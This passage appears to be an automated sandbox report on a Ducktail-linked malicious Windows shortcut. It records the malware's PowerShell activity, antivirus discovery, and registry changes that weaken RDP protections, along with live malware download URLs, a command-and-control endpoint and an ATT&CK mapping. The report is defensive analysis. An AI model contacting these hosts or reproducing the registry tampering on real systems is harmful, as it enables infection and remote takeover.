Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies security policies related information

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin

Source: powershell.exe, 00000004.00000002.3635309749.000001EE970D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3761779223.000001EEB1502000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3760082331.000001EEB143C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Ducktail

Source: Yara match	File source: 00000004.00000002.3639823852.000001EE99A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: amsi64_8900.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8900, type: MEMORYSTR

Remote Access Functionality

Yara detected Ducktail

Source: Yara match	File source: 00000004.00000002.3639823852.000001EE99A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: amsi64_8900.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8900, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	431 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Windows Service	11 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	125 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	11 Process Injection	1 Obfuscated Files or Information	Security Account Manager	441 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	5 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	351 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	13 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	351 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MdmRznA6gx.lnk	26%	ReversingLabs	Shortcut.Trojan.Pantera

Source	Detection	Scanner	Label
https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dca	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9aa29bce71057a1ce039860e7c69eeb0ef1320f1ed0c8150f1948c2ed6bd2e64238c34031fa4510c3f5cb56f2ddedd92af0607a2d92432a03063f1e11b066993a54f1321da127eb7fbaee23c8f	100%	Avira URL Cloud	malware
http://23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1	100%	Avira URL Cloud	malware
https://cocomethode.de/StaticFile/RdpService/79	100%	Avira URL Cloud	malware
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://cocomethode.de	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd85082d15ea7c027b4749aea8867e3e247bd648d250a09153f5a9051f7fcec7ff2ad6088be998d837733babb1d81d0bf712c8881e6fc53dd0663bdd97b4ba27bb02ac3546087195d7a35ff4f222	100%	Avira URL Cloud	malware
http://.css	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2eecb14e0349f34ea28f5372e	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fa	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd8	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe1550829c4b7cb0fd2ddc7	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f	100%	Avira URL Cloud	malware
https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dcadc494ef7b10813af76bf343da6dd0c11bbafd53f9d40c4534b314e17178a5f9839114b731c4ae608c27f3e23b544cc7edefd58334b3e8215446329673/Windows%20Defender/16/16/user/191	100%	Avira URL Cloud	malware
http://cocomethode.de	100%	Avira URL Cloud	malware
http://csoft.com/pki/crl/products/MicRoo3	0%	Avira URL Cloud	safe
http://crl.microso	0%	Avira URL Cloud	safe
https://cocomethode.de/Zd	100%	Avira URL Cloud	malware
http://.jpg	0%	Avira URL Cloud	safe
http://schemas.openxmlformats.or	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe15	100%	Avira URL Cloud	malware
http://23.88.71.29:8000/api/registry	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b3	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f529529d9c5cc3350ab521dfddbe2a77c01bd1692f0dae16e5e78590d23aa42283bc9f003b0925ef770ce3dbb430044380316b396c72e0dbe931d81c382	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b356ad7104732828f4fb9	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5	100%	Avira URL Cloud	malware
https://go.micro	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/client/ws	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/b0cdda893b0765c99d30cddae6fd74c48ea8c4a5922a60ed3ef018a1ea2b77873615eb3	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403f	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.pngh	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6525225d58c437ec7708	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/b0c	100%	Avira URL Cloud	malware
http://crl.microsof	0%	Avira URL Cloud	safe
http://go.microsoft.c	0%	Avira URL Cloud	safe
http://cocomethode.de/api/check	100%	Avira URL Cloud	malware
http://www.apache.o	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57f	100%	Avira URL Cloud	malware
https://oneget.org	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f5	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.pngXz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cocomethode.de	172.67.128.139	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cocomethode.de/file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd85082d15ea7c027b4749aea8867e3e247bd648d250a09153f5a9051f7fcec7ff2ad6088be998d837733babb1d81d0bf712c8881e6fc53dd0663bdd97b4ba27bb02ac3546087195d7a35ff4f222	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9aa29bce71057a1ce039860e7c69eeb0ef1320f1ed0c8150f1948c2ed6bd2e64238c34031fa4510c3f5cb56f2ddedd92af0607a2d92432a03063f1e11b066993a54f1321da127eb7fbaee23c8f	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69	false	Avira URL Cloud: malware	unknown
http://23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/StaticFile/RdpService/79	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2eecb14e0349f34ea28f5372e	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe1550829c4b7cb0fd2ddc7	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dcadc494ef7b10813af76bf343da6dd0c11bbafd53f9d40c4534b314e17178a5f9839114b731c4ae608c27f3e23b544cc7edefd58334b3e8215446329673/Windows%20Defender/16/16/user/191	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/Zd	false	Avira URL Cloud: malware	unknown
http://23.88.71.29:8000/api/registry	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b356ad7104732828f4fb9	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f529529d9c5cc3350ab521dfddbe2a77c01bd1692f0dae16e5e78590d23aa42283bc9f003b0925ef770ce3dbb430044380316b396c72e0dbe931d81c382	false	Avira URL Cloud: malware	unknown
http://23.88.71.29:8000/client/ws	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6525225d58c437ec7708	false	Avira URL Cloud: malware	unknown
http://cocomethode.de/api/check	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dca	powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de	powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5FFA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727E56000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1	powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9	powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://.css	svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://csoft.com/pki/crl/products/MicRoo3	powershell.exe, 00000004.00000002.3761779223.000001EEB1502000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cocomethode.de	powershell.exe, 00000008.00000002.3530703045.0000028E5FFDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727E56000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa	powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fa	powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd8	powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE997E0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/dotnet/runtime	powershell.exe, 0000000D.00000002.4968117998.0000028736A7F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7AA2000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691CC8000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY	svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://aka.ms/dotnet-warnings/	powershell.exe, 0000000D.00000002.4968117998.0000028736A7F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7AA2000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691CC8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://crl.microso	powershell.exe, 00000004.00000002.3759858698.000001EEB1340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/winsvr-2022-pshelpXz	powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/nativeaot-compatibility	myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://contoso.com/	powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.3430851263.000001943E212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3430851263.000001943E349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3747065999.000001EEA91B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3578342341.0000028E6F3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60984000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4968117998.00000287367E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BAA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BA8C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4296362446.0000012F90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 